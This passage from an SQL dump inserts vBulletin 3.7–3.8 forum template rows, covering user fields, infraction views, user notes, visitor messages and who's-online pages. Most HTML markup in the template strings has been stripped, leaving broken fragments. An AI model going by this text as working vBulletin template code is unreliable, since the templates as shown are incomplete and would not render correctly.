(1684, -1, 'userfield_radio_option', ' $val ', ' $val ', 'template', 1199994902, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1685, -1, 'userfield_select', '', '', 'template', 1193764575, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1686, -1, 'userfield_select_multiple', '\r\n\r\n', '\r\n\r\n', 'template', 1193764609, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1687, -1, 'userfield_select_option', '$val ', '$val ', 'template', 1068173170, 'vBulletin Solutions', '', 'vbulletin'),
(1688, -1, 'userfield_textarea', '', '', 'template', 1206451852, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'),
(1689, -1, 'userfield_textbox', '', '', 'template', 1193764644, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1690, -1, 'userfield_wrapper', '\r\n $profilefield[title] \r\n $custom_field_holder\r\n ', '\r\n $profilefield[title] \r\n $custom_field_holder\r\n ', 'template', 1193767296, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1691, -1, 'userinfraction', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[user_infraction] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'pm\']) ? (\"\r\n\r\n\") : (\"\r\n \r\n\")).\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n$postpreview\r\n\r\n\".(($show[\'pm\']) ? (\"\r\n\r\n\r\n \r\n $vbphrase[post_new_private_message]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n \r\n\r\n \r\n
$vbphrase[message_to_user]
\r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n$forumrules\r\n\") : (\"\r\n\r\n\r\n\r\n \r\n $vbphrase[send_new_message]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n $vbphrase[administrative_note] \r\n \r\n
\r\n \r\n\r\n \".(($show[\'email\']) ? (\"\r\n \r\n
\r\n $vbphrase[message_to_user] \r\n $postmessage \r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\")).\"\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[user_infraction] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, 0)\" >\r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n$postpreview\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[post_new_private_message]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n \r\n\r\n \r\n
$vbphrase[message_to_user]
\r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n$forumrules\r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[send_new_message]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n $vbphrase[administrative_note] \r\n \r\n
\r\n \r\n\r\n
\r\n \r\n \r\n $vbphrase[message_to_user] \r\n $postmessage \r\n
\r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875510, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1692, -1, 'userinfractionbit', '\r\n $title \r\n \".(($show[\'count\']) ? (\"$count \") : (\"\")).\"\r\n $infraction[points] \r\n $expires \r\n \".(($show[\'warning\']) ? (\" \") : (\" \")).\" \r\n ', '\r\n $title \r\n $count \r\n $infraction[points] \r\n $expires \r\n \r\n ', 'template', 1155937480, 'vBulletin Solutions', '3.6.1', 'vbulletin'),
(1693, -1, 'userinfraction_banbit', '\r\n $bangroup \r\n $points \r\n $infractions \r\n $period \r\n ', '\r\n $bangroup \r\n $points \r\n $infractions \r\n $period \r\n ', 'template', 1157583659, 'vBulletin Solutions', '3.6.1', 'vbulletin'),
(1694, -1, 'userinfraction_groupbit', '\r\n \r\n\" . construct_phrase(\"$vbphrase[x_y_points]\", \"$grouptitle\", \"$points\") . \"\r\n ', '\r\n \r\n$vbphrase[x_y_points] \r\n ', 'template', 1150141557, 'vBulletin Solutions', '3.6.0 Beta 2', 'vbulletin'),
(1695, -1, 'userinfraction_infobit', '\r\n \r\n \r\n\r\n \".(($infraction[postid]) ? (\"\r\n \".(($show[\'postdeleted\']) ? (\"\r\n $vbphrase[n_a] \r\n \") : (\"\r\n \".(($show[\'threadtitle\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"p=$infraction[postid]#post$infraction[postid]\\\">$infraction[title] \r\n \") : (\"\r\n $vbphrase[private] \r\n \")).\"\r\n \")).\"\r\n \") : (\"\r\n \".(($infraction[\'points\']) ? (\"\r\n $vbphrase[profile_infraction]\r\n \") : (\"\r\n $vbphrase[profile_warning]\r\n \")).\"\r\n \")).\"\r\n\r\n \r\n $infraction[dateline]$infraction[timeline] \r\n \r\n\r\n \".(($show[\'reversed\']) ? (\"\r\n $vbphrase[reversed]\r\n \") : (\"\r\n \".(($show[\'expired\']) ? (\"\r\n $vbphrase[expired]\r\n \") : (\"\r\n \".(($show[\'neverexpires\']) ? (\"$vbphrase[never]\") : (\"$infraction[expires_dateline]$infraction[expires_timeline] \")).\"\r\n \")).\"\r\n \")).\"\r\n \r\n \r\n\r\n $infraction[points] \r\n $infraction[reason] \r\n session->vars[\'sessionurl\'] . \"u=$infraction[whoadded]\\\">$infraction[username] \r\n \".(($show[\'reverse\']) ? (\"session->vars[\'sessionurl\'] . \"do=view&infractionid=$infraction[infractionid]\\\">$vbphrase[view] \") : (\"\")).\"\r\n ', '\r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[n_a] \r\n \r\n \r\n $infraction[title] \r\n \r\n $vbphrase[private] \r\n \r\n \r\n \r\n \r\n $vbphrase[profile_infraction]\r\n \r\n $vbphrase[profile_warning]\r\n \r\n \r\n\r\n \r\n $infraction[dateline]$infraction[timeline] \r\n \r\n\r\n \r\n $vbphrase[reversed]\r\n \r\n \r\n $vbphrase[expired]\r\n \r\n $vbphrase[never] $infraction[expires_dateline]$infraction[expires_timeline] \r\n \r\n \r\n \r\n \r\n\r\n $infraction[points] \r\n $infraction[reason] \r\n $infraction[username] \r\n $vbphrase[view] \r\n ', 'template', 1169636008, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1696, -1, 'userinfraction_view', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[user_infraction] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'reverseoption\']) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \".(($show[\'warning\']) ? (\"$vbphrase[reverse_this_warning]\") : (\"$vbphrase[reverse_this_infraction]\")).\"\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n
\r\n
$vbphrase[reversal_reason]:
\r\n
\r\n
\r\n \r\n\r\n
$vbphrase[to_reverse_this_infraction]\r\n\r\n
\r\n
\r\n \r\n $vbphrase[removal_of_this_infraction]\r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n \".(($show[\'postinfo\']) ? (\"$vbphrase[thread] : $threadinfo[prefix_plain_html] session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title] \".(($postinfo[\'title\']) ? (\"$vbphrase[post] : session->vars[\'sessionurl\'] . \"p=$postinfo[postid]#post$postinfo[postid]\\\">$postinfo[title] \") : (\"session->vars[\'sessionurl\'] . \"p=$postinfo[postid]#post$postinfo[postid]\\\">$vbphrase[view_post] \")).\" \") : (\"\")).\"\r\n $vbphrase[user_infraction]\r\n \r\n \r\n\r\n \r\n \r\n\r\n
\r\n\r\n
\r\n $infractioninfo[status] \r\n \r\n $infractioninfo[title]\r\n
\r\n \r\n\r\n \".(($show[\'expires\']) ? (\"\r\n
\r\n $vbphrase[expires] \r\n \r\n \".(($show[\'never\']) ? (\"\r\n $vbphrase[never]\r\n \") : (\"\r\n $infractioninfo[expires_time] $infractioninfo[expires_date]\r\n \")).\"\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($infractioninfo[\'reason\']) ? (\"\r\n
\r\n $vbphrase[reason] \r\n \r\n $infractioninfo[reason]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n $vbphrase[left_by] \r\n \r\n \r\n\r\n \".(($show[\'note\']) ? (\"\r\n
\r\n $vbphrase[administrative_note] \r\n \r\n $infractioninfo[note]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'expired\']) ? (\"\r\n
\r\n $vbphrase[expired] \r\n \r\n $infractioninfo[expired_time] $infractioninfo[expired_date]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'reversed\']) ? (\"\r\n
\r\n $vbphrase[reversed] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'disthread\']) ? (\"\r\n
\r\n $vbphrase[discussion_thread] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[user_infraction] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[reverse_this_warning] $vbphrase[reverse_this_infraction] \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n
\r\n
$vbphrase[reversal_reason]:
\r\n
\r\n
\r\n \r\n\r\n
$vbphrase[to_reverse_this_infraction]\r\n\r\n
\r\n
\r\n \r\n $vbphrase[removal_of_this_infraction]\r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n $vbphrase[reverse_this_warning] $vbphrase[reverse_this_infraction]\" tabindex=\"1\" accesskey=\"d\" />\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[thread] : $threadinfo[prefix_plain_html] $threadinfo[title] $vbphrase[post] : $postinfo[title] $vbphrase[view_post] \r\n $vbphrase[user_infraction]\r\n \r\n \r\n\r\n \r\n \r\n\r\n
\r\n\r\n
\r\n $infractioninfo[status] \r\n \r\n $infractioninfo[title]\r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[expires] \r\n \r\n \r\n $vbphrase[never]\r\n \r\n $infractioninfo[expires_time] $infractioninfo[expires_date]\r\n \r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[reason] \r\n \r\n $infractioninfo[reason]\r\n
\r\n \r\n \r\n\r\n
\r\n $vbphrase[left_by] \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[administrative_note] \r\n \r\n $infractioninfo[note]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[expired] \r\n \r\n $infractioninfo[expired_time] $infractioninfo[expired_date]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[reversed] \r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[discussion_thread] \r\n \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875495, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1697, -1, 'usernote', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \" . construct_phrase(\"$vbphrase[user_notes_for_x]\", \"$userinfo[username]\") . \" \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \" . construct_phrase(\"$vbphrase[user_notes_for_x]\", \"$userinfo[username]\") . \" \r\n \r\n
\r\n\r\n\".(($show[\'notes\']) ? (\"\r\n\r\n $spacer_close\r\n \r\n $notebits\r\n
\r\n $spacer_open\r\n\r\n\") : (\"\r\n\r\n
\r\n \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[x_does_not_have_any_notes]\", \"$userinfo[username]\") . \"\r\n \r\n \r\n \r\n
\r\n
\r\n\")).\"\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n $forumrules \r\n $forumjump \r\n \r\n
\r\n\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[user_notes_for_x] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n $vbphrase[user_notes_for_x] \r\n \r\n
\r\n\r\n\r\n\r\n $spacer_close\r\n \r\n $notebits\r\n
\r\n $spacer_open\r\n\r\n \r\n\r\n
\r\n \r\n \r\n \r\n $vbphrase[x_does_not_have_any_notes] \r\n \r\n \r\n \r\n
\r\n
\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n $forumrules \r\n $forumjump \r\n \r\n
\r\n\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208860166, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1698, -1, 'usernote_note', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\".(($show[\'editnote\']) ? (\"\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[edit_user_note] \r\n\") : (\"\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[new_user_note] \r\n\")).\"\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'editnote\']) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[delete_user_note]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[delete_user_note] \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\") : (\"\")).\"\r\n\r\noptions[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n \".(($show[\'editnote\']) ? (\"$vbphrase[edit_user_note]\") : (\"$vbphrase[post_new_user_note]\")).\" \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $usernamecode\r\n\r\n \r\n
\r\n $vbphrase[title]: \r\n \r\n
\r\n \r\n\r\n \r\n
$vbphrase[message]:
\r\n $messagearea\r\n \r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \".(($show[\'parseurl\']) ? (\"
$vbphrase[automatically_parse_links_in_text]
\") : (\"\")).\"\r\n $disablesmiliesoption\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n $forumrules \r\n $forumjump \r\n \r\n
\r\n\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n $vboptions[bbtitle] - $vbphrase[edit_user_note] \r\n \r\n $vboptions[bbtitle] - $vbphrase[new_user_note] \r\n \r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[delete_user_note]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[delete_user_note] \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n \r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n $vbphrase[edit_user_note] $vbphrase[post_new_user_note] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $usernamecode\r\n\r\n \r\n
\r\n $vbphrase[title]: \r\n \r\n
\r\n \r\n\r\n \r\n
$vbphrase[message]:
\r\n $messagearea\r\n \r\n\r\n
\r\n \r\n $vbphrase[miscellaneous_options] \r\n \r\n
$vbphrase[automatically_parse_links_in_text]
\r\n $disablesmiliesoption\r\n
\r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n $forumrules \r\n $forumjump \r\n \r\n
\r\n\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875585, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1699, -1, 'visitormessage_editor', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\".(($show[\'delete\']) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[delete_message]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n
$vbphrase[reason_for_deletion]:
\r\n
\r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n$postpreview\r\n\r\noptions[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n \r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\".(($messagebits) ? (\"\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[message_dialog]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n\r\n $messagebits\r\n\r\n
\r\n \r\n \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[delete_message]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n
$vbphrase[reason_for_deletion]:
\r\n
\r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n$postpreview\r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[message_dialog]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n\r\n $messagebits\r\n\r\n
\r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1213617623, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1700, -1, 'visitormessage_preview', '\r\n\r\n \r\n \".(($show[\'errors\']) ? (\"\r\n $vbphrase[errors_occured_when_submitted]:\r\n \") : (\"\r\n $vbphrase[preview]\r\n \")).\"\r\n \r\n \r\n\r\n \r\n \".(($show[\'errors\']) ? (\"\r\n \r\n $errorlist \r\n \r\n \") : (\"\r\n\r\n \".(($newpost[\'title\']) ? (\"\r\n \r\n \r\n $message[title] \r\n
\r\n \r\n \r\n \") : (\"\")).\"\r\n $previewmessage\r\n \")).\"\r\n \r\n \r\n
\r\n\r\n ', '\r\n\r\n \r\n \r\n $vbphrase[errors_occured_when_submitted]:\r\n \r\n $vbphrase[preview]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n $errorlist \r\n \r\n \r\n\r\n \r\n \r\n \r\n $message[title] \r\n
\r\n \r\n \r\n \r\n $previewmessage\r\n \r\n \r\n \r\n
\r\n\r\n ', 'template', 1205156504, 'vBulletin Solutions', '3.7.0 Release Candidate 1', 'vbulletin'),
(1701, -1, 'visitormessage_simpleview', '\r\n\r\n
\r\n
\r\n\r\n
$message[message]
\r\n
\r\n\r\n\r\n \".(($show[\'moderation\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n
\r\n ', '\r\n\r\n
\r\n
\r\n\r\n
$message[message]
\r\n
\r\n\r\n\r\n
\r\n \r\n \r\n\r\n
\r\n ', 'template', 1219144986, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1702, -1, 'visitormessage_simpleview_deleted', '\r\n\r\n
\r\n\r\n
\r\n \" . construct_phrase(\"$vbphrase[message_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[del_userid]\", \"$message[del_username]\") . \"\r\n \".(($message[\'del_reason\']) ? (\"$vbphrase[reason]: $message[del_reason] \") : (\"\")).\"\r\n
\r\n\r\n
\r\n ', '\r\n\r\n
\r\n\r\n
\r\n
$vbphrase[message_deleted_by_x] \r\n
$vbphrase[reason]: $message[del_reason] \r\n
\r\n\r\n
\r\n ', 'template', 1219144781, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1703, -1, 'WHOPOSTED', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vbphrase[who_posted] - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" \r\n\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[who_posted]\r\n \" . construct_phrase(\"$vbphrase[total_posts_x]\", \"$totalposts\") . \"
\r\n \r\n \r\n\r\n $vbphrase[username] \r\n $vbphrase[posts] \r\n \r\n$posters\r\n\r\n \r\n \r\n
\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vbphrase[who_posted] - $vboptions[bbtitle] \r\n\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[who_posted]\r\n \r\n \r\n \r\n\r\n $vbphrase[username] \r\n $vbphrase[posts] \r\n \r\n$posters\r\n\r\n \r\n \r\n
\r\n\r\n\r\n', 'template', 1195729840, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1704, -1, 'whopostedbit', '\r\n \r\n \".(($show[\'memberlink\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$post[userid]\\\" target=\\\"_blank\\\">$post[username] \r\n \") : (\"\r\n $post[username]\r\n \")).\"\r\n \r\n \".(($post[\'userid\']) ? (\"session->vars[\'sessionurl\'] . \"do=finduser&userid=$post[userid]&searchthreadid=$threadinfo[threadid]\\\" onclick=\\\"opener.location=(\'search.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=finduser&userid=$post[userid]&searchthreadid=$threadinfo[threadid]\'); self.close();\\\">$post[posts] \") : (\"$post[posts]\")).\" \r\n ', '\r\n \r\n \r\n $post[username] \r\n \r\n $post[username]\r\n \r\n \r\n $post[posts] $post[posts] \r\n ', 'template', 1264029590, 'vBulletin Solutions', '3.8.5', 'vbulletin'),
(1705, -1, 'WHOSONLINE', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\".(($show[\'refresh\']) ? (\"\r\n \".((is_browser(\'mozilla\')) ? (\"\r\n \r\n \") : (\"\r\n options[\'WOLrefresh\'] . \";url=online.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"order=$sortorder&sort=$sortfield&pp=$perpage&page=$pagenumber$refreshargs\\\" />\r\n \")).\"\r\n\") : (\"\")).\"\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[whos_online] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n
\r\n $vbphrase[reload_this_page] \r\n \r\n
\" . construct_phrase(\"$vbphrase[x_members_and_y_guests]\", \"$numbervisible\", \"$numberguests\") . \" \" . construct_phrase(\"$vbphrase[most_users_ever_online_was_x_y_at_z]\", \"$recordusers\", \"$recorddate\", \"$recordtime\") . \"\r\n
\r\n \r\n\r\n \r\n \r\n $vbphrase[last_activity] $sortarrow[time]\r\n \r\n $vbphrase[username] $sortarrow[username]\r\n \r\n $vbphrase[location_temp] $sortarrow[location] \r\n \".(($show[\'ip\']) ? (\"$vbphrase[ip_address] \") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[\'showimicons\']) ? (\"$vbphrase[instant_messaging] \") : (\"\")).\"\r\n \r\n$onlinebits\r\n
\r\n\r\n\".(($show[\'ajax_resolve\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n + \r\n $vbphrase[user_is_on_your_contact_list] \r\n \r\n \".(($show[\'hidden\']) ? (\"\r\n \r\n * \r\n $vbphrase[user_is_invisible_to_others] \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'badlocation\']) ? (\"\r\n \r\n \r\n $vbphrase[viewing_forum_closed] \r\n \r\n \r\n \r\n $vbphrase[viewing_no_permission_message] \r\n \r\n \r\n \r\n $vbphrase[viewing_error_message] \r\n \r\n \") : (\"\")).\"\r\n
\r\n \r\n \r\n $forumjump\r\n \r\n \r\n
\r\n\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n$vboptions[bbtitle] - $vbphrase[whos_online] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n + \r\n $vbphrase[user_is_on_your_contact_list] \r\n \r\n \r\n \r\n * \r\n $vbphrase[user_is_invisible_to_others] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[viewing_forum_closed] \r\n \r\n \r\n \r\n $vbphrase[viewing_no_permission_message] \r\n \r\n \r\n \r\n $vbphrase[viewing_error_message] \r\n \r\n \r\n
\r\n \r\n \r\n $forumjump\r\n \r\n \r\n
\r\n\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1212144655, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1706, -1, 'whosonlinebit', '\r\n\r\n \r\n $userinfo[time] \r\n \".(($show[\'loggedinuser\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\\\">$userinfo[musername] $userinfo[hidden]\".(($show[\'buddy\']) ? (\"+\") : (\"\")).\"\r\n \") : (\"\r\n \".(($show[\'spider\']) ? (\"$spidertype\") : (\"$userinfo[musername]\")).\"\r\n \")).\"\r\n \r\n\r\n \r\n \r\n \".(($show[\'where\']) ? (\"\r\n \r\n \".(($show[\'subscribed\']) ? (\"
